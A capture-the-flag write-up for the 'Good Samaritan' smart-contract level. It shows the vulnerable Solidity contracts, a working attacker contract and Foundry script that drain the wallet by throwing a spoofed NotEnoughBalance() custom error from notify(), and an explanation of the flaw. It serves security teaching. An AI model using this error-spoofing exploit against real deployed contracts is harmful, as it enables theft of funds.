Level 27 - Good Samaritan ⏺⏺⏺

Last updated 8 months ago

Level 27 - Good Samaritan ⏺⏺⏺

Level Setup

This instance represents a Good Samaritan that is wealthy and ready to donate some coins to anyone requesting it.

Would you be able to drain all the balance from his Wallet?

Things that might help:

Level Contract

// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;

import "openzeppelin-contracts-08/utils/Address.sol";

contract GoodSamaritan {
    Wallet public wallet;
    Coin public coin;

    constructor() {
        wallet = new Wallet();
        coin = new Coin(address(wallet));

        wallet.setCoin(coin);
    }

    function requestDonation() external returns (bool enoughBalance) {
        // donate 10 coins to requester
        try wallet.donate10(msg.sender) {
            return true;
        } catch (bytes memory err) {
            if (keccak256(abi.encodeWithSignature("NotEnoughBalance()")) == keccak256(err)) {
                // send the coins left
                wallet.transferRemainder(msg.sender);
                return false;
            }
        }
    }
}

contract Coin {
    using Address for address;

    mapping(address => uint256) public balances;

    error InsufficientBalance(uint256 current, uint256 required);

    constructor(address wallet_) {
        // one million coins for Good Samaritan initially
        balances[wallet_] = 10 ** 6;
    }

    function transfer(address dest_, uint256 amount_) external {
        uint256 currentBalance = balances[msg.sender];

        // transfer only occurs if balance is enough
        if (amount_ <= currentBalance) {
            balances[msg.sender] -= amount_;
            balances[dest_] += amount_;

            if (dest_.isContract()) {
                // notify contract
                INotifyable(dest_).notify(amount_);
            }
        } else {
            revert InsufficientBalance(currentBalance, amount_);
        }
    }
}

contract Wallet {
    // The owner of the wallet instance
    address public owner;

    Coin public coin;

    error OnlyOwner();
    error NotEnoughBalance();

    modifier onlyOwner() {
        if (msg.sender != owner) {
            revert OnlyOwner();
        }
        _;
    }

    constructor() {
        owner = msg.sender;
    }

    function donate10(address dest_) external onlyOwner {
        // check balance left
        if (coin.balances(address(this)) < 10) {
            revert NotEnoughBalance();
        } else {
            // donate 10 coins
            coin.transfer(dest_, 10);
        }
    }

    function transferRemainder(address dest_) external onlyOwner {
        // transfer balance left
        coin.transfer(dest_, coin.balances(address(this)));
    }

    function setCoin(Coin coin_) external onlyOwner {
        coin = coin_;
    }
}

interface INotifyable {
    function notify(uint256 amount) external;
}

Exploit

make anvil-exploit-level-27

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

make holesky-exploit-level-27

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

src/Level27.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// ================================================================
// │                    LEVEL 27 - GOOD SAMARITAN                 │
// ================================================================
interface IGoodSamaritan {
    function coin() external view returns (address coinAddress);
    function notify(uint256 amount) external;
    function requestDonation() external returns (bool enoughBalance);
}

interface ICoin {
    function balances(address account) external view returns (uint256);
}

contract AttackContract {
    error NotEnoughBalance();

    IGoodSamaritan goodSamaritan;

    function notify(uint256 /* amount */ ) public view {
        // Check the balance of this contract, and if it is 10,
        // then revert with the custom error message NotEnoughBalance
        // to trigger the transferRemainder function in the GoodSamaritan contract
        ICoin coin = ICoin(goodSamaritan.coin());

        if (coin.balances(address(this)) == 10) {
            revert NotEnoughBalance();
        }
    }

    function callGoodSamaritan(address targetContractAddress) public {
        goodSamaritan = IGoodSamaritan(targetContractAddress);
        goodSamaritan.requestDonation();
    }
}

script/Level27.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";

import {AttackContract} from "src/Level27.sol";

// ================================================================
// │                    LEVEL 27 - GOOD SAMARITAN                 │
// ================================================================
interface IGoodSamaritan {
    function coin() external view returns (address coinAddress);
}

interface ICoin {
    function balances(address account) external view returns (uint256);
}

contract Exploit is Script, HelperFunctions {
    function run() public {
        address targetContractAddress = getInstanceAddress();

        vm.startBroadcast();
        AttackContract attackContract = new AttackContract();
        attackContract.callGoodSamaritan(targetContractAddress);
        vm.stopBroadcast();
    }
}

Submit instance... 🥳

Completion Message

Congratulations!

Custom errors in Solidity are identified by their 4-byte ‘selector’, the same as a function call. They are bubbled up through the call chain until they are caught by a catch statement in a try-catch block, as seen in the GoodSamaritan's requestDonation() function. For these reasons, it is not safe to assume that the error was thrown by the immediate target of the contract call (i.e., Wallet in this case). Any other contract further down in the call chain can declare the same error and throw it at an unexpected location, such as in the notify(uint256 amount) function in your attacker contract.

Notes